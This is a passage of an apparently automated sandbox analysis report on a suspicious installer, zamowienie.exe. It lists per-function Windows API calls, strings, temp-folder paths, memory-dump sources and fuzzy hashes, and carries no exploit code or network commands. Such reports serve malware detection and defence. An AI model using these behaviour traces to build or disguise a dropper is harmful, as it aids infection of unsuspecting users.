                                                                                                                                              • Associated: 00000000.00000002.2469810438.0000000073404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2469862791.0000000073406000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_73400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$Free$Alloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1780285237-0
                                                                                                                                              • Opcode ID: d5cb97b8fd6660c784facd66d15408956a2cd9d232225f3fcddacf2aa14e2937
                                                                                                                                              • Instruction ID: d64701f80917b2eb2cc929845e9c9de1ca421c3ae4547809574c9126582303f4
                                                                                                                                              • Opcode Fuzzy Hash: d5cb97b8fd6660c784facd66d15408956a2cd9d232225f3fcddacf2aa14e2937
                                                                                                                                              • Instruction Fuzzy Hash: 0441CF72704219EFE30EAF54CA84E2E77FEEB85208B1449FDF545A72A0C73098058B69
                                                                                                                                              Function 00404DB1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404DCC
                                                                                                                                              • GetMessagePos.USER32 ref: 00404DD4
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404DEE
                                                                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404E00
                                                                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404E26
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                              • String ID: f
                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                              • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                                                                                                                              • Instruction ID: a9c6250cce98d8b52e3a4ba0b4a93ea31e49052898150c2ecbcdb84c6b66d184
                                                                                                                                              • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                                                                                                                              • Instruction Fuzzy Hash: 36019E71900218BAEB00DB94DD85FFFBBBCAF44711F10012BBB00B61D0C7B499418BA4
                                                                                                                                              Function 00401E5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetDC.USER32(?), ref: 00401E5D
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                                                                                                                              • CreateFontIndirectA.GDI32(0040B820), ref: 00401EDF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                              • String ID: Tahoma
                                                                                                                                              • API String ID: 3808545654-3580928618
                                                                                                                                              • Opcode ID: 5b1cc09c1bfd387fb6a8acff3338b87f8f9e65aa7c9416f2c7d7f238a5b4f98e
                                                                                                                                              • Instruction ID: b69917716a541bd4796a60a55a2362698fb41d3dea0d830b9302405c98ab91d6
                                                                                                                                              • Opcode Fuzzy Hash: 5b1cc09c1bfd387fb6a8acff3338b87f8f9e65aa7c9416f2c7d7f238a5b4f98e
                                                                                                                                              • Instruction Fuzzy Hash: 01014072904344AFE7007B64AE89A9E3FB8E715701F10987AF141B62F2CB794005CB6D
                                                                                                                                              Function 00402E4A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E65
                                                                                                                                              • wsprintfA.USER32 ref: 00402E99
                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402EA9
                                                                                                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EBB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                                                              • Opcode ID: 71edbbfcd38a5cf25fa41dd78e6502004d6f2f503a5ec3f242630c3e9865e773
                                                                                                                                              • Instruction ID: 4d17fdd3e7c6cab59feb050d7df4f2e3620e99bdfe0bf7055c3989393c578c71
                                                                                                                                              • Opcode Fuzzy Hash: 71edbbfcd38a5cf25fa41dd78e6502004d6f2f503a5ec3f242630c3e9865e773
                                                                                                                                              • Instruction Fuzzy Hash: 78F0817054020CEBEF209F50CD0AFAE3769EB00349F00803AFA12B51D0DBF889558F99
                                                                                                                                              Function 73402381 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 734024D7
                                                                                                                                                • Part of subcall function 734012B4: lstrcpynA.KERNEL32(00000000,?,7340135F,-7340504B,734011C0,-000000A0), ref: 734012C4
                                                                                                                                              • GlobalAlloc.KERNEL32(?,?), ref: 73402452
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73402467
                                                                                                                                              • GlobalAlloc.KERNEL32(?,?), ref: 73402478
                                                                                                                                              • CLSIDFromString.OLE32(00000000,00000000), ref: 73402486
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 7340248D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2469658319.0000000073400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2469810438.0000000073404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2469862791.0000000073406000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_73400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3730416702-0
                                                                                                                                              • Opcode ID: 2194abe0b3e7454f107fbe90f9d057b2b592dd438e13066a7dda732b3648d5b2
                                                                                                                                              • Instruction ID: 8c9554b341a6a1926d39b27472167bf6f9ba366965975e70195ef26fdea3ac23
                                                                                                                                              • Opcode Fuzzy Hash: 2194abe0b3e7454f107fbe90f9d057b2b592dd438e13066a7dda732b3648d5b2
                                                                                                                                              • Instruction Fuzzy Hash: 9C41AFB2708308EFE3199F349940B2A73F8FB40315F1449BEE556EA6C0E7709445CB69
                                                                                                                                              Function 0040283B Relevance: 9.1, APIs: 6, Instructions: 77memoryfileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00405F51: GetFileAttributesA.KERNELBASE(00000003,00402FC4,C:\Users\user\Desktop\zamowienie.exe,80000000,00000003), ref: 00405F55
                                                                                                                                                • Part of subcall function 00405F51: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F77
                                                                                                                                              • GlobalAlloc.KERNEL32(?,?), ref: 0040286E
                                                                                                                                                • Part of subcall function 004034A9: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004031A7,?), ref: 004034B7
                                                                                                                                              • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040288A
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004028C9
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                                                                                                                                • Part of subcall function 00403222: SetFilePointer.KERNELBASE(0000000A,00000000,00000000,00000000,00000000,?,?,004031CE,000000FF,00000000,00000000,0000000A,?), ref: 00403247
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 004028F8
                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0040290B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Global$AllocFreePointer$AttributesCloseCreateDeleteHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 488507980-0
                                                                                                                                              • Opcode ID: b1de723b102a86e7d872b7f2cd7c38dc2df8caf973a81d31e2e55e2540d49469
                                                                                                                                              • Instruction ID: c0e9616b4afca8c64668262dc628c1609f1adc6a49346ada0331d72917486a59
                                                                                                                                              • Opcode Fuzzy Hash: b1de723b102a86e7d872b7f2cd7c38dc2df8caf973a81d31e2e55e2540d49469
                                                                                                                                              • Instruction Fuzzy Hash: EC213972C00128BBDF216FA5DD489AEBB79EF04364B14823AF554B62E0CB7949419F68
                                                                                                                                              Function 00404CA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(00420950,00420950,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404BC2,000000DF,00000000,00000400,?), ref: 00404D45
                                                                                                                                              • wsprintfA.USER32 ref: 00404D4D
                                                                                                                                              • SetDlgItemTextA.USER32(?,00420950), ref: 00404D60
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                              • String ID: %u.%u%s%s$PB
                                                                                                                                              • API String ID: 3540041739-1436518253
                                                                                                                                              • Opcode ID: d337dd74189e72dcb0c2b62014cc3533d70f46b2d75e50d72d1433aa9521b4fc
                                                                                                                                              • Instruction ID: 08cb112fabba5a66575a4450cc2f57e80891ffdbd0ec58c8caaf6efbf0c5f7af
                                                                                                                                              • Opcode Fuzzy Hash: d337dd74189e72dcb0c2b62014cc3533d70f46b2d75e50d72d1433aa9521b4fc
                                                                                                                                              • Instruction Fuzzy Hash: 9F11B77360412837EB00656D9C45FAE36999B85374F264237FA26F31D2E978CC5242E8
                                                                                                                                              Function 734018C7 Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2469658319.0000000073400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2469810438.0000000073404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2469862791.0000000073406000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_73400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeGlobal
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2979337801-0
                                                                                                                                              • Opcode ID: 6823e6c8646c670fd856ddca469763c4ed3f63dfccbb221330c66105f4e225ae
                                                                                                                                              • Instruction ID: d7f868c882db86920950f6f6be91f7fa0351f92abf4e7ad3e685a2a0f9481c1b
                                                                                                                                              • Opcode Fuzzy Hash: 6823e6c8646c670fd856ddca469763c4ed3f63dfccbb221330c66105f4e225ae
                                                                                                                                              • Instruction Fuzzy Hash: A451C37EF04119AFDB0E9BF4894076D7BBAEB45244F1801FAD417B3284F6319A818F59
                                                                                                                                              Function 00401D8A Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401DA3
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00401DF1
                                                                                                                                              • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                                                                                                                              • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401E45
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                              • Opcode ID: 1100d3a670809fd7746ff0c86559c97455677b3aa147eef4fc382cbcb66dfe22
                                                                                                                                              • Instruction ID: c0ef476fca5f278da91b5b28714a55140b227db46093564fdbdafc316f69a883
                                                                                                                                              • Opcode Fuzzy Hash: 1100d3a670809fd7746ff0c86559c97455677b3aa147eef4fc382cbcb66dfe22
                                                                                                                                              • Instruction Fuzzy Hash: 2F210A72A00509ABDF15DF94DD45AAEBBB6FB44301F10407AF905F62A1CB389941DB58
                                                                                                                                              Function 00405D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00405D56
                                                                                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00405D5F
                                                                                                                                              • lstrcatA.KERNEL32(?,0040A014,?,?,0000000A,?), ref: 00405D70
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                              • API String ID: 2659869361-823278215
                                                                                                                                              • Opcode ID: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                                                                                                                              • Instruction ID: 496e46fcea84712a5b67e9520e3ad6bc5dce3c30524205b23ad6e34059498e2e
                                                                                                                                              • Opcode Fuzzy Hash: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                                                                                                                              • Instruction Fuzzy Hash: 61D0A9A2205A303BE2022725AD09ECF2A488F02315B06406BF640F21A2C7BC5C2287FE
                                                                                                                                              Function 00403AD5 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(000002EC,C:\Users\user\AppData\Local\Temp\,004038D8,?,?,?,0000000A,?), ref: 00403AE7
                                                                                                                                              • CloseHandle.KERNEL32(000002F8,C:\Users\user\AppData\Local\Temp\,004038D8,?,?,?,0000000A,?), ref: 00403AFB
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403ADA
                                                                                                                                              • C:\Users\user\AppData\Local\Temp\nsz31BB.tmp, xrefs: 00403B0B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandle
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz31BB.tmp
                                                                                                                                              • API String ID: 2962429428-441691096
                                                                                                                                              • Opcode ID: aeb99d232cf47e8a20d3d5ec1d32ffc6ab59edb41f783ba39e9555f72a53b2ca
                                                                                                                                              • Instruction ID: 94c9627cb3cc1b5e3196ac64c7e2d6575cdca21f285912a133c113318477e523
                                                                                                                                              • Opcode Fuzzy Hash: aeb99d232cf47e8a20d3d5ec1d32ffc6ab59edb41f783ba39e9555f72a53b2ca
                                                                                                                                              • Instruction Fuzzy Hash: E4E086305407189AC120EF7CAD4D9853B285B413357608726F178F20F1C738A99A5EAD
                                                                                                                                              Function 00405D97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402FED,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\zamowienie.exe,C:\Users\user\Desktop\zamowienie.exe,80000000,00000003), ref: 00405D9D
                                                                                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402FED,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\zamowienie.exe,C:\Users\user\Desktop\zamowienie.exe,80000000,00000003), ref: 00405DAB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharPrevlstrlen
                                                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                                                              • API String ID: 2709904686-1246513382
                                                                                                                                              • Opcode ID: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                                                                                                                              • Instruction ID: 80daa9ef4ef6c79f70618e5c43a555a7848ee468dbe5a2310235cfd6ebfc96f6
                                                                                                                                              • Opcode Fuzzy Hash: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                                                                                                                              • Instruction Fuzzy Hash: 66D0A772409D705EF34363209C08BCF6A89CF12300F0940A7E5C0E2191C2BC0C4147ED
                                                                                                                                              Function 734010E0 Relevance: 5.1, APIs: 4, Instructions: 144memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GlobalAlloc.KERNEL32(?,?), ref: 7340116B
                                                                                                                                              • GlobalAlloc.KERNEL32(?,?), ref: 734011D8
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 73401286
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 7340129B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2469658319.0000000073400000.00000002.00000001.01000000.00000005.sdmpDownload File
